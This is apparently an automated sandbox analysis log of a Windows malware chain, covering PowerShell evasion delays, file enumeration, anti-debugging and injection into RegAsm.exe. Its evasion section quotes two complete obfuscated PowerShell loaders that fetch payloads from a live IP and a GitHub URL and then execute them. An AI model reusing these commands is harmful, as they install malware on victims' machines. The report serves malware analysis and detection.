                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3664Thread sleep time: -300000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3756Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3700Thread sleep count: 5709 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3696Thread sleep count: 2420 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3736Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3952Thread sleep count: 1010 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3952Thread sleep count: 1742 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3992Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3972Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4032Thread sleep count: 3103 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4028Thread sleep count: 2416 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4076Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\System32\mshta.exe TID: 2760Thread sleep time: -420000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1592Thread sleep count: 1686 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1592Thread sleep count: 2297 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1372Thread sleep time: -180000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2452Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888Thread sleep count: 1520 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2140Thread sleep count: 2271 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1256Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2888Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1040Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1484Thread sleep count: 220 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1484Thread sleep time: -110000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3008Thread sleep count: 463 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3008Thread sleep time: -1389000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2612Thread sleep time: -180000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3008Thread sleep count: 9037 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3008Thread sleep time: -27111000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3604Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3500Thread sleep count: 864 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3496Thread sleep count: 967 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3708Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3696Thread sleep count: 1278 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3648Thread sleep count: 3252 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3772Thread sleep time: -3689348814741908s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3668Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3772Thread sleep time: -1800000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3772Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3680Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,20_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_10006580 FindFirstFileExA,20_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0040AE51 FindFirstFileW,FindNextFileW,24_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,25_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,26_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,31_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,31_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,31_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,31_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,31_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00407877 FindFirstFileW,FindNextFileW,31_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0044E8F9 FindFirstFileExA,31_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,31_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,31_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,31_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,31_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00418981 memset,GetSystemInfo,24_2_00418981
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                  Source: wscript.exe, 0000000B.00000003.449845935.0000000000532000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.486671185.0000000000181000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: maBsUhaSJBQemUf@I[
                  Source: wscript.exe, 0000000B.00000003.451171058.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.489557829.0000000003B31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: maBsUhaSJBQemUf1g
                  Source: wscript.exe, 0000000B.00000003.451171058.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.450474080.0000000003661000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.450500625.00000000002E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.488352569.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.488480055.0000000000518000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.489557829.0000000003B31000.00000004.00000020.00020000.00000000.sdmp, seethebestpricewithgoodcookiesme[1].tiff.5.dr, seethebestpricewithgoodcookiesm.vbS.5.drBinary or memory string: maBsUhaSJBQemUf = "KkihOcWzULKLWxx"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_25-34250
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_100060E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,24_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,31_2_0041CBE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_10004AB4 mov eax, dword ptr fs:[00000030h]20_2_10004AB4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00443355 mov eax, dword ptr fs:[00000030h]31_2_00443355
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_1000724E GetProcessHeap,20_2_1000724E
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_100060E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_10002639
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_10002B1C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00434BD8 SetUnhandledExceptionFilter,31_2_00434BD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_0043503C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_0043BB71

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR
                  Bypasses PowerShell execution policy
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Maps a DLL or memory area into another process
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe31_2_00412132
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00419662 mouse_event,31_2_00419662
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXeJump to behavior
